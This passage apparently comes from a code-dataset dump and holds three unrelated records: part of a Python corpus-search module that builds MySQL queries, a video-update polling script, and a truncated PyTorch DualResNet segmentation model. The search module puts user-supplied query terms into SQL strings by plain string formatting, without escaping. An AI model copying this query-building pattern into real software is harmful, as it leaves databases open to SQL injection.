\"%s.word%s\" % (prevname, n)\n return x\n\n def writeDist(self, prevname, prevcolums, dists, relation='syntax'):\n where = []\n rest = []\n for (son, father, minDist, maxDist) in dists:\n sonname = self.writeTraget(prevname, prevcolums, son, relation)\n fathername = self.writeTraget(prevname, prevcolums, father, relation)\n\n if sonname != None and fathername != None:\n if minDist != None and maxDist != None:\n where.append(u\"(%s - %s BETWEEN %s AND %s)\" % (sonname, fathername, minDist, maxDist))\n elif minDist != None:\n where.append(u\"(%s - %s >= %s)\" % (sonname, fathername, minDist))\n elif maxDist != None:\n where.append(u\"(%s - %s <= %s)\" % (sonname, fathername, maxDist))\n else:\n rest.append((son, father, minDist, maxDist))\n return (where, rest)\n\n def formLfPrepQuery(self):\n if not self.lfPrep:\n return ''\n query = 'SELECT lexical_functions.* from lexical_functions, words'\n\n feature_matching = [('document', 'document'), ('sentence', 'sentence'), ('word', 'lf_prep')]\n # adding parsed attribute conditions (which concern the word form only)\n l = []\n where = []\n for el in self.lfPrepParsed:\n y = []\n for e in el:\n neg = \"\"\n if e[0] == \"-\":\n neg = \"!\"\n e = e[1:]\n if e != None:\n y.append(u\"words.form %s= '%s'\" % (neg, e))\n if len(y) > 0:\n l.append(\" AND \".join(y))\n if len(l) > 0:\n where.append(\"(%s)\" % \" OR \".join(l))\n # basic table correspondence conditions\n join_features = [\"words.%s = lexical_functions.%s\" % (words_feature, lf_feature) \\\n for (words_feature, lf_feature) in feature_matching]\n where.append(\" AND \".join(join_features))\n query += ' where %s' % ' AND '.join(where)\n return query\n\n def sql(self, con, prev):\n colums = [\"words.document\", \"words.sentence\"]\n tables = []\n where = []\n res = [[], \"temp%s\" % self.n, []]\n\n tmpname = None\n if prev != None:\n res[0] = prev[0]\n tmpname = prev[1]\n for el in res[0]:\n colums.append(\"%s.word%s AS word%s\" % (tmpname, el, el))\n if self.n in prev[0]:\n where.append(u\"words.word = %s.word%s\" % (tmpname, self.n))\n else:\n colums.append(\"words.word AS word%s\" % self.n)\n res[0].append(self.n)\n tables = [prev[1], \"words\"]\n where.append(u\"%s.document = words.document AND %s.sentence = words.sentence\" % (tmpname, tmpname))\n else:\n tables.append(\"words\")\n colums.append(\"words.word AS word%s\" % self.n)\n res[0] = [self.n]\n\n l = []\n for el in self.lexParsed:\n y = []\n for e in el:\n neg = \"\"\n if e[0] == \"-\":\n neg = \"!\"\n e = e.replace(\"-\", \"\")\n if e[0] == '\"':\n y.append(u\"words.form %s= '%s'\" % (neg, e.replace('\"', \"\")))\n else:\n y.append(u\"words.lex %s= '%s'\" % (neg, e))\n if len(y) > 0:\n l.append(\"(%s)\" % \" AND \".join(y))\n if len(l) > 0:\n where.append(\"(%s)\" % \" OR \".join(l))\n\n l = ProduceCondition(\"gramms\", \"gramm\", self.grammParsed)\n if l:\n where.append(l)\n\n l = ProduceCondition(\"flags\", \"flags\", self.flagsParsed)\n if l:\n where.append(l)\n\n if self.linkExists:\n if self.father not in res[0]:\n colums.append(\"words.father AS word%s\" % self.father)\n res[0].append(self.father)\n where.append(u\"words.father IS NOT NULL\")\n else:\n where.append(u\"words.father = %s.word%s\" % (tmpname, self.father))\n\n l = []\n for el in self.linkParsed:\n y = []\n for e in el:\n neg = \"\"\n if e[0] == \"-\":\n neg = \"!\"\n e = e[1:]\n e = con.links.getId(e)\n if e != None:\n y.append(u\"words.link %s= '%s'\" % (neg, e))\n if len(y) > 0:\n l.append(\" AND \".join(y))\n if len(l) > 0:\n where.append(\"(%s)\" % \" OR \".join(l))\n\n if self.lfExists:\n join_features = [\"words.%s = %s.%s\" % (feature, self.lfTable, feature) \\\n for feature in ['document', 'sentence', 'word']]\n where.append(\" AND \".join(join_features))\n if self.lfPrep:\n create_tmp = 'CREATE TEMPORARY TABLE %s (' % self.lfTable\n create_tmp += 'document INTEGER,'\n create_tmp += 'sentence INTEGER,'\n create_tmp += 'word SMALLINT,'\n create_tmp += 'lf_val SMALLINT,'\n create_tmp += 'lf_prep SMALLINT,'\n create_tmp += 'lf_func VARCHAR(32),'\n create_tmp += 'PRIMARY KEY (document, sentence, word, lf_val, lf_prep, lf_func))'\n create_tmp += ' ENGINE = MyISAM'\n self.create.append(create_tmp)\n self.query.append(self.formLfPrepQuery())\n tables.append(self.lfTable)\n if self.lfVal not in res[0]:\n colums.append(\"%s.lf_val AS word%s\" % (self.lfTable, self.lfVal))\n res[0].append(self.lfVal)\n elif tmpname:\n where.append(u\"%s.lf_val = %s.word%s\" % (self.lfTable, tmpname, self.lfVal))\n elif self.linkExists:\n where.append(u\"%s.lf_val = words.father\" % (self.lfTable))\n\n l = []\n for el in self.lfFuncParsed:\n y = []\n for e in el:\n neg = \"\"\n if e[0] == \"-\":\n neg = \"!\"\n e = e[1:]\n if e != None:\n y.append(u\"%s.lf_func %s= '%s'\" % (self.lfTable, neg, e))\n if len(y) > 0:\n l.append(\" AND \".join(y))\n if len(l) > 0:\n where.append(\"(%s)\" % \" OR \".join(l))\n\n # conditions on syntactic relation distance\n if self.linkExists:\n distances = self.makeDistances(self.father, tmpname, prev, 'syntax')\n if len(distances) > 1:\n where.extend(distances[0])\n res[2].extend(distances[1])\n # condition on lexical function relation distance\n if self.lfExists:\n distances = self.makeDistances(self.lfVal, tmpname, prev, 'lexical_function')\n if len(distances) > 1:\n where.extend(distances[0])\n res[2].extend(distances[1])\n\n if con.docid >= 0:\n where.append(u\"words.document = %s\" % (con.docid))\n\n if len(where) == 0:\n where.append(\"TRUE\")\n self.query.append(\"SELECT DISTINCT %s FROM %s WHERE %s\" % (\", \".join(colums), \", \".join(tables), \" AND \".join(where)))\n\n request = []\n request.append(\"CREATE TEMPORARY TABLE `%s` (\" % res[1])\n request.append(\"`document` INTEGER NOT NULL,\")\n request.append(\"`sentence` SMALLINT NOT NULL,\")\n t = [\"`document`\", \"`sentence`\"]\n for el in res[0]:\n request.append(\"`word%s` SMALLINT NOT NULL,\" % el)\n t.append(\"`word%s`\" % el)\n request.append(\"INDEX `KEY` (%s)\" % \", \".join(t))\n request.append(\") ENGINE = MEMORY\")\n\n self.create.append(\" \".join(request))\n\n res[0].sort()\n return res\n\n def makeDistances(self, in_from_element, in_tmpname, in_prev, in_relation):\n dists = []\n if self.minDist != None or self.maxDist != None:\n dists.append((self.n, in_from_element, self.minDist, self.maxDist))\n\n if in_prev != None:\n dists.extend(in_prev[2])\n\n if in_prev != None:\n dists = self.writeDist(in_tmpname, in_prev[0], dists, in_relation)\n else:\n dists = self.writeDist(in_tmpname, [], dists, in_relation)\n return dists\n\nclass Search:\n def __init__(self, query, db, out):\n self.db = db\n self.docid = -1\n self.stype = \"all-documents\"\n self.cursor = self.db.cursor()\n self.out = codecs.getwriter(\"utf8\")(out, 'xmlcharrefreplace')\n self.time = 0\n self.page = 0\n self.dpp = 10 # documents per page\n self.spd = 10 # snippets per document\n self.spp = 50 # snippets per page\n self.gramms = Attributes(self.cursor, \"gramms\")\n self.flags = Attributes(self.cursor, \"flags\")\n self.links = Attributes(self.cursor, \"links\")\n self.words = []\n self.query = []\n self.colums = None\n self.table = None\n self.doSearch = True\n self.writeWordInfo = False\n self.get_corpus_stats()\n\n self.docid = int(query.get(\"docid\", [-1])[0])\n if self.docid >= 0:\n self.stype = \"document\"\n self.page = int(query.get(\"ps\", [self.page])[0])\n else:\n self.page = int(query.get(\"p\", [self.page])[0])\n\n text = query.get(\"text\", [\"\"])[0]\n if text == \"word-info\":\n self.stype = \"word-info\"\n self.source = query.get(\"source\", [\"\"])[0]\n self.doSearch = False\n self.writeWordInfo = True\n elif text == 'document-info':\n self.doSearch = False\n self.stype = 'document-info'\n else:\n try:\n self.dpp = int(query.get(\"dpp\", [self.dpp])[0])\n self.spd = int(query.get(\"spd\", [self.spd])[0])\n self.spp = int(query.get(\"spp\", [self.spp])[0])\n except:\n pass\n\n if text == \"lexform\":\n tokens = query.get(\"req\", [\"\"])[0].replace(\"&\", \" \").replace(\"|\", \" \").replace(\",\", \" \").replace(\"(\", \" \").replace(\")\", \" \").replace(\"\\\"\", \" \").split()\n for index, token in enumerate(tokens):\n real_index = index + 1\n query[\"lex%s\" % real_index] = ['\"%s\"' % token]\n if real_index > 1:\n query[\"min%s\" % real_index] = [\"1\"]\n query[\"max%s\" % real_index] = [\"1\"]\n query[\"parent%s\" % real_index] = [real_index - 1]\n\n while \"lex%s\" % (len(self.words) + 1) in query:\n self.words.append(Word(query, len(self.words)))\n\n def get_corpus_stats(self):\n self.cursor.execute(\"SELECT documents_number, sentences_number, words_number FROM corpus_stats;\")\n self.total_documents, self.total_sentences, self.total_words = self.cursor.fetchall()[0]\n\n def request(self):\n self.query = [x for x in self.words if not x.empty()]\n self.query.sort(cmp=lambda x,y: cmp(x.value(), y.value()), reverse=True)\n\n table = None\n for el in self.query:\n table = el.sql(self, table)\n self.colums = table[0]\n self.table = table[1]\n\n def hit(self):\n self.time = 0\n begin = time.time()\n last = begin\n prev = None\n for el in self.query:\n if self.time > max_time:\n raise Exception\n if not el.empty():\n assert len(el.create) == len(el.query)\n for (create_clause, query_clause) in zip(el.create, el.query):\n self.cursor.execute(\"%s %s\" % (create_clause, query_clause))\n self.time += time.time() - last\n last = time.time()\n if prev != None:\n self.cursor.execute(\"DROP TABLE IF EXISTS temp%s;\" % (prev))\n prev = el.n\n\n def writeAnaEl(self, name, vals):\n self.out.write('' % name)\n self.out.write(\"\")\n for el in vals:\n self.out.write(\"%s \" % _quoteattr(el))\n self.out.write(\" \")\n self.out.write(\" \")\n\n def writeWord(self, lex, gramm, text, target = False):\n if text != None:\n source = \"|\".join((lex, str(gramm), text))\n source = urllib.quote(codecs.getencoder(\"utf8\")(source)[0])\n self.out.write('\")\n if self.writeWordInfo:\n self.out.write(\"\")\n self.writeAnaEl(\"lex\", [lex])\n self.writeAnaEl(\"gramm\", self.gramms.getValue(gramm))\n self.out.write(\" \")\n self.out.write(\" \")\n\n def searchResult(self):\n self.cursor.execute(\"SELECT DISTINCT COUNT(DISTINCT document), COUNT(DISTINCT document, sentence), COUNT(*) FROM `%s`;\" % self.table)\n res = self.cursor.fetchall()\n documentCount = res[0][0]\n sentenceCount = res[0][1]\n hitCount = res[0][2]\n\n self.out.write('' % (documentCount, sentenceCount, hitCount, _quoteattr(self.stype)))\n \n self.out.write(' ' % (self.total_documents, self.total_sentences, self.total_words))\n\n pmin = self.page * self.dpp\n pmax = self.dpp\n if self.stype == \"document\":\n pmin = 0\n pmax = 1\n\n self.cursor.execute(\n \"SELECT DISTINCT document, url, title, image, COUNT(DISTINCT sentence) FROM `%s`, `documents` WHERE %s.document = documents.id GROUP BY document LIMIT %s, %s\" %\n (self.table, self.table, pmin, pmax))\n\n docs = self.cursor.fetchall()\n\n if len(docs) > 2:\n self.cursor.execute(\"DELETE FROM `%s` WHERE document < %s OR document > %s;\" % (self.table, docs[0][0], docs[-1][0]))\n\n for (document, url, title, image, snippets) in docs:\n self.out.write('' % (document, _quoteattr(url), _quoteattr(title), snippets))\n\n pmin = 0\n pmax = self.spd\n if self.stype == \"document\":\n pmin = self.page * self.spp\n pmax = self.spp\n\n self.cursor.execute(\"SELECT DISTINCT sentence FROM %s WHERE %s.document = %s LIMIT %s, %s\" % (self.table, self.table, document, pmin, pmax))\n\n sentences = self.cursor.fetchall()\n if len(sentences) > 2:\n self.cursor.execute(\"DELETE FROM `%s` WHERE document = %s AND (sentence < %s OR sentence > %s);\" % (self.table, document, sentences[0][0], sentences[-1][0]))\n\n for (sentence,) in sentences:\n self.out.write(\"\" % (sentence, _quoteattr(image), sentence))\n\n tar = []\n for el in self.colums:\n tar.append(\"%s.word%s = words.word\" % (self.table, el))\n tar = \"SELECT * FROM %s WHERE %s.document = %s AND %s.sentence = %s AND (%s)\" % (self.table, self.table, document, self.table, sentence, \" OR \".join(tar))\n self.cursor.execute(\"SELECT lex, gramm, trash, text, EXISTS(%s) FROM words WHERE document = %s AND sentence = %s\" % (tar, document, sentence))\n\n for (lex, gramm, trash, text, target) in self.cursor.fetchall():\n self.out.write(\"%s \" % _quotetext(trash))\n self.writeWord(lex, gramm, text, target)\n self.out.write(\" \")\n self.out.write(\" \")\n self.out.write(\" \")\n\n def writeDocumentInfo(self, in_docid):\n self.cursor.execute(\"SELECT title, url FROM documents WHERE id = %s\" % in_docid)\n docs = self.cursor.fetchall()\n\n assert len(docs) == 1\n (title, url) = docs[0]\n self.out.write('' % (in_docid, _quoteattr(url), _quoteattr(title)))\n self.out.write('')\n self.out.write(' ' % _quoteattr(title))\n self.out.write(' ')\n self.out.write(' ')\n\n\n def result(self):\n if self.doSearch:\n self.searchResult()\n else:\n self.out.write(\"\")\n if self.stype == 'document-info':\n self.writeDocumentInfo(self.docid)\n else:\n query = self.source.split(\"|\")\n if len(query) > 2:\n self.writeWord(query[0], int(query[1]), query[2])\n self.out.write(\" \")\n\n def execute(self):\n self.out.write(u\"\")\n\n if self.doSearch:\n self.request()\n self.hit()\n self.out.write(u'' % self.page)\n self.out.write(u'' % (self.dpp, self.spd, self.spp))\n self.out.write(u'')\n for el in self.words:\n self.out.write(el.xml())\n self.out.write(u\" \")\n self.out.write(u'')\n for el in self.query:\n self.out.write(el.xml(True))\n self.out.write(u' ')\n self.out.write(u\" \")\n\n times = time.time()\n self.result()\n self.out.write(u'' % (self.time, time.time() - times))\n\n self.out.write(u\"\")\n","sub_path":"search/syntax/sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":25050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"310771154","text":"# -*- encoding=utf-8 -*-\nimport paras\nimport random, time\nfrom video_APP import bobotv, bestv\n\n\nbobo = bobotv(paras.urls_boboTV,paras.headers_boboTV,paras.paras_boboTV)\n# print(bobo.search('极限挑战','综艺'))\n# print(bobo.update_head())\n# print(bobo.update_video('http://epg.bobo.itvsh.cn/epg/api/series/00000001000000100000000000001331.json'))\n\n# vid_bst=['2970859','2967763','2974938']\nbest = bestv(paras.urls_bestv,paras.headers_bestv,paras.paras_bestv)\n# print(be.update_head())\n# print(be.search('魔都风云'))\n# print(be.update_video('2970859'))\n\n'''\nah = iTV(paras.urls_iTV,paras.headers_iTV,paras.paras_iTV)\n# print(ah.search('如果'))\n# print(ah.update_video('Vstartek205943','3'))\n# print(ah.update_head())\n# print(ah.update_token())\n\nuhd = UHD(paras.urls_UHD,paras.headers_UHD,paras.paras_UHD)\n# print(uhd.search('如果'))\n# print(uhd.update_head())\n# print(uhd.update_video('524','4'))\n\nhn = HuNan_TV(paras.urls_HuNanTV,paras.headers_HuNanTV,paras.paras_HuNanTV)\n# print(hn.search('人民'))\n# print(hn.update_video('24B16FEDE9A67C9251D3E7C7161C83AC'))\n# print(hn.update_head())\n\n\n\niTV_video = {'obj':ah,'list':{'梅花儿香':['Vstartek285969','3'],'婚姻遇险记':['Vstartek285184','3']}}\n\nhn_video = {'obj':hn,'list':{'梅花儿香':'Attr_E7AE9DD3036717895F9944A5B9346A68',\n '婚姻遇险记':'Attr_11C0A1255A042376FAA36A9ABCD1A727',\n '非常静距离':'Merge_E00DA03B685A0DD18FB6A08AF0923DE0',\n '非你莫属':'Merge_F718499C1C8CEF6730F9FD03C8125CAB'}}\n\n\nuhd_video = {'obj':uhd,'list':{'梅花儿香':['Umai:SERI/4093400@BESTV.SMG.SMG','3'],\n '婚姻遇险记':['Umai:SERI/4085907@BESTV.SMG.SMG','3'],\n '金牌调解':['1902','9'],\n '非你莫属':['12118','10'],\n '非常完美':['8609','4'],}}\n'''\nbobo_video = {'obj':bobo,'list':{'梅花儿香':'https://epg.bobo.itvsh.cn/epg/api/series/00000001000000100000000000001455.json',\n '婚姻遇险记':'https://epg.bobo.itvsh.cn/epg/api/series/00000001000000100000000000001453.json',\n '非常静距离':'https://epg.bobo.itvsh.cn/epg/api/album/album_19.json'}}\n\nbest_video = {'obj':best,'list':{'梅花儿香':'3170127'}}\n\n\n\nlists = [bobo_video, best_video]\n\n\nresult = ''\nfor li in lists:\n for k,v in li['list'].items():\n if isinstance(v,str):\n time.sleep(random.uniform(4, 6))\n print(k, '&', li['obj'].update_video(v))\n result += k+'&'+li['obj'].update_video(v)+'\\n'\n else:\n pass\n # time.sleep(random.uniform(4, 6))\n # print(k, '&', li['obj'].update_video(v[0],v[1]))\n # result += k + '&' +li['obj'].update_video(v[0],v[1])+'\\n'\n\nf = open('video_update.txt', 'a')\nf.write(result)\nf.close()\n","sub_path":"Proj_App/VideoSite/update_video.py","file_name":"update_video.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"475487664","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nBatchNorm2d = nn.BatchNorm2d\nbn_mom = 0.1\n\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n\nclass ConvBnAct(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size=1, stride=1, padding=0, dilation=1, groups=1,\n bias=False, apply_act=True):\n super(ConvBnAct, self).__init__()\n self.conv=nn.Conv2d(in_channels,out_channels,kernel_size,stride,padding,dilation,groups,bias)\n self.bn=nn.BatchNorm2d(out_channels)\n if apply_act:\n self.act=nn.ReLU(inplace=True)\n else:\n self.act=None\n def forward(self, x):\n x = self.conv(x)\n x = self.bn(x)\n if self.act is not None:\n x=self.act(x)\n return x\n\nclass BnActConv(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size=1, stride=1, padding=0, dilation=1, groups=1,\n bias=False):\n super(BnActConv, self).__init__()\n self.bn=nn.BatchNorm2d(in_channels)\n self.act=nn.ReLU(inplace=True)\n self.conv=nn.Conv2d(in_channels,out_channels,kernel_size,stride,padding,dilation,groups,bias)\n def forward(self, x):\n x = self.bn(x)\n x=self.act(x)\n x = self.conv(x)\n return x\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None, no_relu=False):\n super(BasicBlock, self).__init__()\n self.conv1 = conv3x3(inplanes, planes, stride)\n self.bn1 = BatchNorm2d(planes, momentum=bn_mom)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = conv3x3(planes, planes)\n self.bn2 = BatchNorm2d(planes, momentum=bn_mom)\n self.downsample = downsample\n self.stride = stride\n self.no_relu = no_relu\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n\n if self.no_relu:\n return out\n else:\n return self.relu(out)\n\nclass Bottleneck(nn.Module):\n expansion = 2\n\n def __init__(self, inplanes, planes, stride=1, downsample=None, no_relu=True):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)\n self.bn1 = BatchNorm2d(planes, momentum=bn_mom)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n self.bn2 = BatchNorm2d(planes, momentum=bn_mom)\n self.conv3 = nn.Conv2d(planes, planes * self.expansion, kernel_size=1,\n bias=False)\n self.bn3 = BatchNorm2d(planes * self.expansion, momentum=bn_mom)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n self.no_relu = no_relu\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n if self.no_relu:\n return out\n else:\n return self.relu(out)\n\nclass DAPPM(nn.Module):\n def __init__(self, inplanes, branch_planes, outplanes):\n super(DAPPM, self).__init__()\n # self.scale1 = nn.Sequential(nn.AvgPool2d(kernel_size=5, stride=2, padding=2),\n # BatchNorm2d(inplanes, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(inplanes, branch_planes, kernel_size=1, bias=False),\n # )\n self.scale1=nn.Sequential(\n nn.AvgPool2d(kernel_size=5, stride=2, padding=2),\n BnActConv(inplanes,branch_planes)\n )\n # self.scale2 = nn.Sequential(nn.AvgPool2d(kernel_size=9, stride=4, padding=4),\n # BatchNorm2d(inplanes, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(inplanes, branch_planes, kernel_size=1, bias=False),\n # )\n self.scale2=nn.Sequential(\n nn.AvgPool2d(kernel_size=9, stride=4, padding=4),\n BnActConv(inplanes,branch_planes)\n )\n # self.scale3 = nn.Sequential(nn.AvgPool2d(kernel_size=17, stride=8, padding=8),\n # BatchNorm2d(inplanes, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(inplanes, branch_planes, kernel_size=1, bias=False),\n # )\n self.scale3=nn.Sequential(\n nn.AvgPool2d(kernel_size=17, stride=8, padding=8),\n BnActConv(inplanes,branch_planes)\n )\n # self.scale4 = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)),\n # BatchNorm2d(inplanes, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(inplanes, branch_planes, kernel_size=1, bias=False),\n # )\n self.scale4=nn.Sequential(\n nn.AdaptiveAvgPool2d((1, 1)),\n BnActConv(inplanes,branch_planes)\n )\n # self.scale0 = nn.Sequential(\n # BatchNorm2d(inplanes, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(inplanes, branch_planes, kernel_size=1, bias=False),\n # )\n self.scale0=BnActConv(inplanes,branch_planes)\n # self.process1 = nn.Sequential(\n # BatchNorm2d(branch_planes, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(branch_planes, branch_planes, kernel_size=3, padding=1, bias=False),\n # )\n self.process1=BnActConv(branch_planes,branch_planes,3,padding=1)\n # self.process2 = nn.Sequential(\n # BatchNorm2d(branch_planes, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(branch_planes, branch_planes, kernel_size=3, padding=1, bias=False),\n # )\n self.process2=BnActConv(branch_planes,branch_planes,3,padding=1)\n # self.process3 = nn.Sequential(\n # BatchNorm2d(branch_planes, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(branch_planes, branch_planes, kernel_size=3, padding=1, bias=False),\n # )\n self.process3=BnActConv(branch_planes,branch_planes,3,padding=1)\n # self.process4 = nn.Sequential(\n # BatchNorm2d(branch_planes, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(branch_planes, branch_planes, kernel_size=3, padding=1, bias=False),\n # )\n self.process4=BnActConv(branch_planes,branch_planes,3,padding=1)\n # self.compression = nn.Sequential(\n # BatchNorm2d(branch_planes * 5, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(branch_planes * 5, outplanes, kernel_size=1, bias=False),\n # )\n self.compression=BnActConv(branch_planes * 5,outplanes,1)\n # self.shortcut = nn.Sequential(\n # BatchNorm2d(inplanes, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(inplanes, outplanes, kernel_size=1, bias=False),\n # )\n self.shortcut=BnActConv(inplanes,outplanes,1)\n\n def forward(self, x):\n\n #x = self.downsample(x)\n width = x.shape[-1]\n height = x.shape[-2]\n x_list = []\n\n x_list.append(self.scale0(x))\n x_list.append(self.process1((F.interpolate(self.scale1(x),\n size=[height, width],\n mode='bilinear',\n align_corners=False)+x_list[0])))\n x_list.append((self.process2((F.interpolate(self.scale2(x),\n size=[height, width],\n mode='bilinear',\n align_corners=False)+x_list[1]))))\n x_list.append(self.process3((F.interpolate(self.scale3(x),\n size=[height, width],\n mode='bilinear',\n align_corners=False)+x_list[2])))\n x_list.append(self.process4((F.interpolate(self.scale4(x),\n size=[height, width],\n mode='bilinear',\n align_corners=False)+x_list[3])))\n\n out = self.compression(torch.cat(x_list, 1)) + self.shortcut(x)\n return out\n\n\nclass segmenthead(nn.Module):\n\n def __init__(self, inplanes, interplanes, outplanes):\n super(segmenthead, self).__init__()\n self.bn1 = BatchNorm2d(inplanes, momentum=bn_mom)\n self.conv1 = nn.Conv2d(inplanes, interplanes, kernel_size=3, padding=1, bias=False)\n self.bn2 = BatchNorm2d(interplanes, momentum=bn_mom)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = nn.Conv2d(interplanes, outplanes, kernel_size=1, padding=0, bias=True)\n # self.scale_factor = scale_factor\n\n def forward(self, x):\n\n x = self.conv1(self.relu(self.bn1(x)))\n out = self.conv2(self.relu(self.bn2(x)))\n #\n # if self.scale_factor is not None:\n # height = x.shape[-2] * self.scale_factor\n # width = x.shape[-1] * self.scale_factor\n # out = F.interpolate(out,\n # size=[height, width],\n # mode='bilinear')\n\n return out\n\nclass DualResNet(nn.Module):\n\n def __init__(self, block, layers, num_classes=19, planes=64, spp_planes=128, head_planes=128, augment=False):\n super(DualResNet, self).__init__()\n\n highres_planes = planes * 2\n self.augment = augment\n\n # self.conv1 = nn.Sequential(\n # nn.Conv2d(3,planes,kernel_size=3, stride=2, padding=1),\n # BatchNorm2d(planes, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(planes,planes,kernel_size=3, stride=2, padding=1),\n # BatchNorm2d(planes, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # )\n self.conv1=nn.Sequential(\n ConvBnAct(3,planes,3,2,1),\n ConvBnAct(planes,planes,3,2,1),\n )\n\n self.relu = nn.ReLU(inplace=False)\n self.layer1 = self._make_layer(block, planes, planes, layers[0])\n self.layer2 = self._make_layer(block, planes, planes * 2, layers[1], stride=2)\n self.layer3 = self._make_layer(block, planes * 2, planes * 4, layers[2], stride=2)\n self.layer4 = self._make_layer(block, planes * 4, planes * 8, layers[3], stride=2)\n\n # self.compression3 = nn.Sequential(\n # nn.Conv2d(planes * 4, highres_planes, kernel_size=1, bias=False),\n # BatchNorm2d(highres_planes, momentum=bn_mom),\n # )\n self.compression3=ConvBnAct(planes*4,highres_planes,apply_act=False)\n\n # self.compression4 = nn.Sequential(\n # nn.Conv2d(planes * 8, highres_planes, kernel_size=1, bias=False),\n # BatchNorm2d(highres_planes, momentum=bn_mom),\n # )\n self.compression4=ConvBnAct(planes * 8, highres_planes,apply_act=False)\n\n # self.down3 = nn.Sequential(\n # nn.Conv2d(highres_planes, planes * 4, kernel_size=3, stride=2, padding=1, bias=False),\n # BatchNorm2d(planes * 4, momentum=bn_mom),\n # )\n self.down3=ConvBnAct(highres_planes, planes * 4,3,2,1,apply_act=False)\n\n # self.down4 = nn.Sequential(\n # nn.Conv2d(highres_planes, planes * 4, kernel_size=3, stride=2, padding=1, bias=False),\n # BatchNorm2d(planes * 4, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(planes * 4, planes * 8, kernel_size=3, stride=2, padding=1, bias=False),\n # BatchNorm2d(planes * 8, momentum=bn_mom),\n # )\n self.down4=nn.Sequential(\n ConvBnAct(highres_planes, planes * 4,3,2,1),\n ConvBnAct(planes * 4, planes * 8,3,2,1,apply_act=False)\n )\n\n self.layer3_ = self._make_layer(block, planes * 2, highres_planes, 2)\n\n self.layer4_ = self._make_layer(block, highres_planes, highres_planes, 2)\n\n self.layer5_ = self._make_layer(Bottleneck, highres_planes, highres_planes, 1)\n\n self.layer5 = self._make_layer(Bottleneck, planes * 8, planes * 8, 1, stride=2)\n\n self.spp = DAPPM(planes * 16, spp_planes, planes * 4)\n\n if self.augment:\n self.seghead_extra = segmenthead(highres_planes, head_planes, num_classes)\n\n self.final_layer = segmenthead(planes * 4, head_planes, num_classes)\n\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n\n def _make_layer(self, block, inplanes, planes, blocks, stride=1):\n downsample = None\n if stride != 1 or inplanes != planes * block.expansion:\n # downsample = nn.Sequential(\n # nn.Conv2d(inplanes, planes * block.expansion,\n # kernel_size=1, stride=stride, bias=False),\n # nn.BatchNorm2d(planes * block.expansion, momentum=bn_mom),\n # )\n downsample=ConvBnAct(inplanes, planes * block.expansion,stride=stride,apply_act=False)\n\n layers = []\n layers.append(block(inplanes, planes, stride, downsample))\n inplanes = planes * block.expansion\n for i in range(1, blocks):\n if i == (blocks-1):\n layers.append(block(inplanes, planes, stride=1, no_relu=True))\n else:\n layers.append(block(inplanes, planes, stride=1, no_relu=False))\n\n return nn.Sequential(*layers)\n\n\n def forward(self, x):\n original_size=x.shape[-2:]\n width_output = x.shape[-1] // 8\n height_output = x.shape[-2] // 8\n layers = []\n\n x = self.conv1(x)\n\n x = self.layer1(x)\n layers.append(x)\n\n x = self.layer2(self.relu(x))\n layers.append(x)\n\n x = self.layer3(self.relu(x))\n layers.append(x)\n x_ = self.layer3_(self.relu(layers[1]))\n\n x = x + self.down3(self.relu(x_))\n x_ = x_ + F.interpolate(\n self.compression3(self.relu(layers[2])),\n size=[height_output, width_output],\n mode='bilinear',align_corners=False)\n if self.augment:\n temp = x_\n\n x = self.layer4(self.relu(x))\n layers.append(x)\n x_ = self.layer4_(self.relu(x_))\n\n x = x + self.down4(self.relu(x_))\n x_ = x_ + F.interpolate(\n self.compression4(self.relu(layers[3])),\n size=[height_output, width_output],\n mode='bilinear',align_corners=False)\n\n x_ = self.layer5_(self.relu(x_))\n x = F.interpolate(\n 